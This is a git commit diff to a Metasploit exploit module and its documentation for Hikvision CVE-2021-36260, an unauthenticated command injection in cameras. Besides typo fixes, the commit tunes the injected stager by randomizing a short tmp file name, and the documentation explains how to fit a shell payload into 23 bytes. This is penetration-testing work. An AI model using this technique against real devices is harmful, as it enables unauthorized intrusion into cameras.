Fixed a couple of typos. Changed a CheckCode. Randomized the replaced tmp file name

jbaines-r7 · jbaines-r7 · commit e1616a520f0f · 2022-02-24T06:38:36.000-08:00
diff --git a/documentation/modules/exploit/linux/http/hikvision_cve_2021_36260_blind.md b/documentation/modules/exploit/linux/http/hikvision_cve_2021_36260_blind.md
@@ -20,7 +20,7 @@ string is:
 Which accounts for 12 bytes, leaving only 19 bytes for our payload. Fortunately,
 snprintf will let us reclaim '.tar.gz' so in reality, there are 26 bytes for our payload.
 We need 3 bytes to invoke our injection: $(). Leaving 23 bytes for payload. The 'echo'
-stager has a minium of 26 bytes but we obviously don't have that much space. We can steal
+stager has a minimum of 26 bytes but we obviously don't have that much space. We can steal
 the extra space from the "random" file name and compress ' >> ' to '>>'. That will get us
 below 23. Squeezing the extra  bytes will also allow printf stager to do more than 1 byte
 per exploitation.
@@ -48,7 +48,7 @@ table in the [Hikvision advisory](https://www.hikvision.com/en/support/cybersecu
 
 ### Target 0
 
-Target 1 is a busybox telnetd bind shell.
+Target 0 is a busybox telnetd bind shell.
 
 ### Target 1
 
diff --git a/modules/exploits/linux/http/hikvision_cve_2021_36260_blind.rb b/modules/exploits/linux/http/hikvision_cve_2021_36260_blind.rb
@@ -132,7 +132,7 @@ def check
       'data' => payload
     }, 10)
 
-    return CheckCode::Appears('As determined by HTTP status replies.') unless res
+    return CheckCode::Vulnerable('It appears the target executed the provided sleep command.') unless res
 
     CheckCode::Safe('The target did not execute the provided sleep command.')
   end
@@ -150,7 +150,7 @@ def execute_command(cmd, _opts = {})
     # have that much space. We can steal the extra space from the "random" file name
     # and compress ' >> ' to '>>'. That will get us below 23. Squeezing the extra
     # bytes will also allow printf stager to do more than 1 byte per exploitation.
-    cmd = cmd.gsub(%r{tmp/[0-9a-zA-Z]+}, 'tmp/a')
+    cmd = cmd.gsub(%r{tmp/[0-9a-zA-Z]+}, @fname)
     cmd = cmd.gsub(/ >/, '>')
     cmd = cmd.gsub(/> /, '>')
 
@@ -167,6 +167,10 @@ def execute_command(cmd, _opts = {})
 
   def exploit
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    # generate a random value for the tmp file name. See execute_command for details
+    @fname = "tmp/#{Rex::Text.rand_text_alpha(1)}"
+
     case target['Type']
     when :unix_cmd
       execute_command(payload.encoded)
